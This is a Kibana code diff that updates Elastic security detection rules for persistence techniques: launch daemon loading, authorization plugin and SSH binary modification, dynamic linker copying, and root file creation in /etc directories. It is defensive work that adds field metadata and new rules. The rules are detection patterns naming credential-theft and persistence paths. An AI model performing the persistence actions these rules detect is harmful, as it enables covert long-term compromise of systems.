Modification and Immediate Loading", - "query": "sequence by host.id with maxspan=1m\n [file where event.type != \"deletion\" and file.path in (\"/System/Library/LaunchDaemons/*\", \"/Library/LaunchDaemons/*\")]\n [process where event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", + "query": "sequence by host.id with maxspan=1m\n [file where event.type != \"deletion\" and file.path : (\"/System/Library/LaunchDaemons/*\", \"/Library/LaunchDaemons/*\")]\n [process where event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", "references": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9d19ece6-c20e-481a-90c5-ccca596537de", "severity": "low", @@ -46,5 +73,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json index d66066bca644e..db16ffe049247 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_authorization_plugin_creation.json @@ -11,11 +11,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Authorization Plugin Modification", - "query": "event.category:file and not event.type:deletion and\n file.path:(/Library/Security/SecurityAgentPlugins/* and\n not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/Contents/*)\n", + "query": "event.category:file and not event.type:deletion and\n file.path:(/Library/Security/SecurityAgentPlugins/* and\n not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/*) and\n not process.name:shove and process.code_signature.trusted:true\n", "references": [ "https://developer.apple.com/documentation/security/authorization_plug-ins", "https://www.xorrior.com/persistent-credential-theft/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6c98d38-633d-4b3e-9387-42112cd5ac10", "severity": "medium", @@ -52,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json index 31e52590e22e0..1a1c673467041 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_auth_module_or_config.json @@ -21,6 +21,33 @@ "http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html", "https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "93f47b6f-5728-4004-ba00-625083b3dcb0", "severity": "medium", @@ -67,5 +94,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json index 46414c400ab8d..2efb3c33c0c78 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_credential_access_modify_ssh_binaries.json @@ -14,10 +14,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Modification of OpenSSH Binaries", - "query": "event.category:file and event.type:change and \n process.name:* and\n (file.path:(/usr/sbin/sshd or /usr/bin/ssh or /usr/bin/sftp or /usr/bin/scp) or file.name:libkeyutils.so) and\n not process.executable:/usr/bin/dpkg\n", + "query": "event.category:file and event.type:change and\n process.name:* and\n (file.path:(/usr/sbin/sshd or /usr/bin/ssh or /usr/bin/sftp or /usr/bin/scp) or file.name:libkeyutils.so) and\n not process.name:(\"dpkg\" or \"yum\" or \"dnf\" or \"dnf-automatic\")\n", "references": [ "https://blog.angelalonso.es/2016/09/anatomy-of-real-linux-intrusion-part-ii.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0415f22a-2336-45fa-ba07-618a5942e22c", "severity": "medium", @@ -63,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json index 3527b14b2de65..c79a3debe7a46 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_crontab_creation.json @@ -15,6 +15,28 @@ "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf", "https://theevilbit.github.io/beyond/beyond_0004/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "530178da-92ea-43ce-94c2-8877a826783d", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json index 7ff8f12e60011..8aadc2ffc8072 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.json @@ -17,6 +17,28 @@ "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "083fa162-e790-4d85-9aeb-4fea04188adb", "severity": "medium", @@ -76,5 +98,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json index 0fce2b7647df4..82850ede5a0c0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_directory_services_plugins_modification.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the creation or modification of a DirectoryService PlugIns (dsplug) file. The DirectoryService daemonlaunches on each system boot and automatically reloads after crash. It scans and executes bundles that are located in the DirectoryServices PlugIns folder and can be abused by adversaries to maintain persistence.", + "description": "Identifies the creation or modification of a DirectoryService PlugIns (dsplug) file. The DirectoryService daemon launches on each system boot and automatically reloads after crash. It scans and executes bundles that are located in the DirectoryServices PlugIns folder and can be abused by adversaries to maintain persistence.", "from": "now-9m", "index": [ "auditbeat-*", @@ -15,6 +15,23 @@ "references": [ "https://blog.chichou.me/2019/11/21/two-macos-persistence-tricks-abusing-plugins/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "89fa6cb7-6b53-4de2-b604-648488841ab8", "severity": "medium", @@ -44,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json index e513b5ace737f..350fcb648ea16 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_docker_shortcuts_plist_modification.json @@ -15,6 +15,28 @@ "references": [ "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c81cefcb-82b9-4408-a533-3c3df549e62d", "severity": "medium", @@ -44,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json index da4f102eae2c3..2502b88363343 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dontexpirepasswd_account.json @@ -20,6 +20,28 @@ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dont_expire", "https://blog.menasec.net/2019/02/threat-hunting-26-persistent-password.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "62a70f6f-3c37-43df-a556-f64fa475fba2", "severity": "medium", @@ -50,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dynamic_linker_backup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dynamic_linker_backup.json new file mode 100644 index 0000000000000..51f6b85ee67a7 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_dynamic_linker_backup.json @@ -0,0 +1,86 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dynamic Linker Copy", + "query": "sequence by process.entity_id with maxspan=1m\n[process where event.type == \"start\" and process.name : (\"cp\", \"rsync\") and process.args : (\"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\")]\n[file where event.action == \"creation\" and file.extension == \"so\"]\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 85, + "rule_id": "df6f62d9-caab-4b88-affa-044f4395a1e0", + "severity": "high", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Orbit" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json index 9002924a3df32..eab6904515aa9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_network_acl_creation.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Network Access Control List Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(CreateNetworkAcl or CreateNetworkAclEntry) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/create-network-acl.html", @@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/create-network-acl-entry.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateNetworkAclEntry.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "39144f38-5284-4f8e-a2ae-e3fd628d90b0", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json index 526438d6bf430..c94941aa68c6b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ec2_security_group_configuration_change_detection.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Security Group Configuration Change Detection", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(AuthorizeSecurityGroupEgress or \nCreateSecurityGroup or ModifyInstanceAttribute or ModifySecurityGroupRules or RevokeSecurityGroupEgress or \nRevokeSecurityGroupIngress) and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(AuthorizeSecurityGroupEgress or\nCreateSecurityGroup or ModifyInstanceAttribute or ModifySecurityGroupRules or RevokeSecurityGroupEgress or\nRevokeSecurityGroupIngress) and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-security-groups.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "29052c19-ff3e-42fd-8363-7be14d7c5469", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -67,5 +97,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json index a2ab1c137fb15..418fdea42ed4d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_file_creation.json @@ -11,14 +11,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Emond Rules Creation or Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.path : (\"/private/etc/emond.d/rules/*.plist\", \"/etc/emon.d/rules/*.plist\", \"/private/var/db/emondClients/*\")\n", "references": [ "https://www.xorrior.com/emond-persistence/", "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json index d18a53d5e5965..56527b8e6f204 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_emond_rules_process_execution.json @@ -14,6 +14,23 @@ "references": [ "https://www.xorrior.com/emond-persistence/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3e3d15c6-1509-479a-b125-21718372157e", "severity": "medium", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json index b81496a79f960..c0e20d4ba8544 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_enable_root_account.json @@ -15,6 +15,28 @@ "references": [ "https://ss64.com/osx/dsenableroot.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cc2fd2d0-ba3a-4939-b87f-2901764ed036", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_etc_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_etc_file_creation.json new file mode 100644 index 0000000000000..c703d84eb54fa --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_etc_file_creation.json @@ -0,0 +1,147 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence for long term access.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation in /etc for Persistence", + "query": "file where event.action == \"creation\" and user.name == \"root\" and file.path : (\"/etc/ld.so.conf.d/*\", \"/etc/cron.d/*\", \"/etc/sudoers.d/*\", \"/etc/rc.d/init.d/*\", \"/etc/systemd/system/*\") and not process.executable : (\"*/dpkg\", \"*/yum\", \"*/apt\", \"*/dnf\", \"*/systemd\")\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 80, + "rule_id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Orbit", + "Lightning Framework" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json index 12350f2b4b483..fcc91266785a9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json @@ -11,13 +11,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation of Hidden Launch Agent or Daemon", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and\n file.path : \n (\n \"/System/Library/LaunchAgents/.*.plist\",\n \"/Library/LaunchAgents/.*.plist\",\n \"/Users/*/Library/LaunchAgents/.*.plist\",\n \"/System/Library/LaunchDaemons/.*.plist\",\n \"/Library/LaunchDaemons/.*.plist\"\n )\n", + "note": "", + "query": "file where event.type != \"deletion\" and\n file.path :\n (\n \"/System/Library/LaunchAgents/.*.plist\",\n \"/Library/LaunchAgents/.*.plist\",\n \"/Users/*/Library/LaunchAgents/.*.plist\",\n \"/System/Library/LaunchDaemons/.*.plist\",\n \"/Library/LaunchDaemons/.*.plist\"\n )\n", "references": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -75,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json index 68776fcdff429..0c73b9e36d5ad 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json @@ -12,14 +12,22 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation of a Hidden Local User Account", - "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and\nbypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to 